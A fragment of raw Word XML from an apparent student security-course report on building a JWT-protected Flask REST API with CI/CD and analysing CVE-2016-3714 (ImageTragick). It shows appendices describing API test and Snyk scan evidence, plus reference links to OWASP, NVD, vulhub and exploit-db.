            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>This document</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Appendix D.  API Test Evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The screenshot below shows the live API test session used to verify the authentication flow and the protected endpoints. The login returns a JWT, an unauthenticated GET is rejected with 401, and an authenticated GET/POST succeeds with 200/201.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="120" w:after="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5040000" cy="2634430"/>
            <wp:docPr id="6" name="Picture 6"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="06-api-tests.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5040000" cy="2634430"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="595959"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Figure 6 - API functional tests: login, unauthenticated 401, authenticated GET 200 and POST 201.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Appendix E.  SCA Report Evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The Snyk HTML report downloaded from the successful CI artifact confirms the SCA result for the pinned Python dependencies: 9 dependencies scanned, 0 known vulnerabilities and 0 vulnerable dependency paths.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="120" w:after="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5040000" cy="3960000"/>
            <wp:docPr id="7" name="Picture 7"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="09-snyk-report.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5040000" cy="3960000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="595959"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Figure 7 - Snyk test report: 9 dependencies, 0 known vulnerabilities, 0 vulnerable paths.</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fldChar w:fldCharType="begin"/>
      <w:instrText xml:space="preserve">PAGE</w:instrText>
      <w:fldChar w:fldCharType="separate"/>
      <w:t>1</w:t>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="595959"/>
        <w:sz w:val="17"/>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Work 1  |  Secure REST API, CI/CD and CVE-2016-3714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EggplantPig/WeiLixuan23320107-IS-Work-1" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/EggplantPig/WeiLixuan23320107-IS-Work-1/actions/runs/40357227529"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owasp.org/www-project-top-ten/" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cheatsheetseries.owasp.org/" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://jwt.io/introduction" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.github.com/en/actions" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/vulhub/vulhub" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2016-3714" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://imagetragick.com/" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/39767/" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/EggplantPig/WeiLixuan23320107-IS-Work-1/blob/main/cve/CVE-2016-3714/README.md" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/EggplantPig/WeiLixuan23320107-IS-Work-1/blob/main/report/Work-1-Report.md" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId2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1 - Secure REST API Development with CI/CD and Real CVE Vulnerability Analysis</dc:title>
  <dc:subject>HDU IS Work 1 report</dc:subject>
  <dc:creator>Wei Lixuan</dc:creator>
  <cp:keywords>Flask, JWT, bandit, safety, CVE-2016-3714, ImageMagick</cp:keywords>
  <dc:description>HDU IS course Work 1 report</dc:description>
  <cp:lastModifiedBy/>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-12-23T23:15:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2013-12-23T23:15:00Z</dcterms:modified>
  <cp:category/>
</cp:coreProperties>
</file>